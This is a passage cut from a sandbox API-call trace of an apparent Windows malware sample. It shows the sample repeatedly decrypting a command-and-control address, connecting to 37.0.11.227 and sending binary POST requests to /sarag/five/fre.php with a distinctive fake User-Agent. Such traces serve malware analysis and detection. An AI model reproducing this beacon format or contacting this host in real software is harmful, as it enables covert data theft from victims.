GetProcessHeap () returned 0x690000 [0251.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0251.474] GetProcessHeap () returned 0x690000 [0251.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.474] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.475] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.475] GetProcessHeap () returned 0x690000 [0251.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0251.475] GetProcessHeap () returned 0x690000 [0251.475] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.475] send (s=0x704, buf=0x6ad508*, len=242, flags=0) returned 242 [0251.476] send (s=0x704, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.476] GetProcessHeap () returned 0x690000 [0251.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0251.476] recv (in: s=0x704, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.550] GetProcessHeap () returned 0x690000 [0251.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0251.550] GetProcessHeap () returned 0x690000 [0251.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.550] GetProcessHeap () returned 0x690000 [0251.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0251.551] GetProcessHeap () returned 0x690000 [0251.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0251.552] closesocket (s=0x704) returned 0 [0251.553] GetProcessHeap () returned 0x690000 [0251.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0251.553] GetProcessHeap () returned 0x690000 [0251.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.554] GetProcessHeap () returned 0x690000 [0251.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0251.554] GetProcessHeap () returned 0x690000 [0251.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0251.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x146c) returned 0x704 [0251.556] Sleep (dwMilliseconds=0xea60) [0251.557] GetProcessHeap () returned 0x690000 [0251.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0251.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.558] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0251.571] GetProcessHeap () returned 0x690000 [0251.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0251.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.572] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.573] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.574] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.574] GetProcessHeap () returned 0x690000 [0251.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0251.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.575] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0251.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.576] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.576] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0251.576] GetProcessHeap () returned 0x690000 [0251.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.582] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.583] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.584] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.585] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.585] GetProcessHeap () returned 0x690000 [0251.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0251.585] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.585] GetProcessHeap () returned 0x690000 [0251.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0251.586] GetProcessHeap () returned 0x690000 [0251.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.586] GetProcessHeap () returned 0x690000 [0251.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.586] GetProcessHeap () returned 0x690000 [0251.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0251.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0251.602] GetProcessHeap () returned 0x690000 [0251.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0251.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.603] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.604] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.605] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.605] GetProcessHeap () returned 0x690000 [0251.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0251.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.606] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0251.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.607] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.607] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0251.608] GetProcessHeap () returned 0x690000 [0251.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0251.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.608] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.609] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.610] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.611] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.611] GetProcessHeap () returned 0x690000 [0251.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0251.611] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.611] GetProcessHeap () returned 0x690000 [0251.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0251.611] socket (af=2, type=1, protocol=6) returned 0x708 [0251.611] connect (s=0x708, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0251.640] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0251.640] GetProcessHeap () returned 0x690000 [0251.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0251.640] GetProcessHeap () returned 0x690000 [0251.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0251.641] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.641] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.641] GetProcessHeap () returned 0x690000 [0251.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0251.641] GetProcessHeap () returned 0x690000 [0251.642] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.642] GetProcessHeap () returned 0x690000 [0251.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0251.642] GetProcessHeap () returned 0x690000 [0251.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.643] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.643] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.643] GetProcessHeap () returned 0x690000 [0251.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0251.643] GetProcessHeap () returned 0x690000 [0251.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.644] send (s=0x708, buf=0x6ad508*, len=242, flags=0) returned 242 [0251.644] send (s=0x708, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.644] GetProcessHeap () returned 0x690000 [0251.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0251.645] recv (in: s=0x708, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0251.725] GetProcessHeap () returned 0x690000 [0251.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0251.726] GetProcessHeap () returned 0x690000 [0251.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0251.727] GetProcessHeap () returned 0x690000 [0251.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0251.727] GetProcessHeap () returned 0x690000 [0251.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0251.727] closesocket (s=0x708) returned 0 [0251.728] GetProcessHeap () returned 0x690000 [0251.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0251.728] GetProcessHeap () returned 0x690000 [0251.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0251.728] GetProcessHeap () returned 0x690000 [0251.728] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0251.728] GetProcessHeap () returned 0x690000 [0251.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0251.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1470) returned 0x708 [0251.730] Sleep (dwMilliseconds=0xea60) [0251.732] GetProcessHeap () returned 0x690000 [0251.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0251.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.733] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0251.754] GetProcessHeap () returned 0x690000 [0251.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0251.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.755] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.756] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.757] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.757] GetProcessHeap () returned 0x690000 [0251.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0251.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.758] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0251.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.759] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.760] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0251.760] GetProcessHeap () returned 0x690000 [0251.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0251.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.761] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.762] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.763] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.763] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.763] GetProcessHeap () returned 0x690000 [0251.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0251.764] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.764] GetProcessHeap () returned 0x690000 [0251.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0251.764] GetProcessHeap () returned 0x690000 [0251.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0251.765] GetProcessHeap () returned 0x690000 [0251.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0251.765] GetProcessHeap () returned 0x690000 [0251.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0251.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.772] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0251.778] GetProcessHeap () returned 0x690000 [0251.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0251.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.783] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0251.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.785] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.787] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.787] GetProcessHeap () returned 0x690000 [0251.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0251.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.788] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0251.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.789] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0251.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0251.790] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0251.790] GetProcessHeap () returned 0x690000 [0251.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0251.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0251.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.793] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0251.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.794] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0251.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0251.795] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0251.795] GetProcessHeap () returned 0x690000 [0251.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0251.795] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0251.795] GetProcessHeap () returned 0x690000 [0251.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0251.795] socket (af=2, type=1, protocol=6) returned 0x70c [0251.796] connect (s=0x70c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0251.826] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0251.826] GetProcessHeap () returned 0x690000 [0251.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0251.826] GetProcessHeap () returned 0x690000 [0251.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0251.827] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.828] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.828] GetProcessHeap () returned 0x690000 [0251.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0251.829] GetProcessHeap () returned 0x690000 [0251.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.829] GetProcessHeap () returned 0x690000 [0251.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0251.829] GetProcessHeap () returned 0x690000 [0251.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0251.830] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0251.831] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.831] GetProcessHeap () returned 0x690000 [0251.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0251.831] GetProcessHeap () returned 0x690000 [0251.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0251.831] send (s=0x70c, buf=0x6ab500*, len=242, flags=0) returned 242 [0251.832] send (s=0x70c, buf=0x6aba40*, len=159, flags=0) returned 159 [0251.832] GetProcessHeap () returned 0x690000 [0251.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 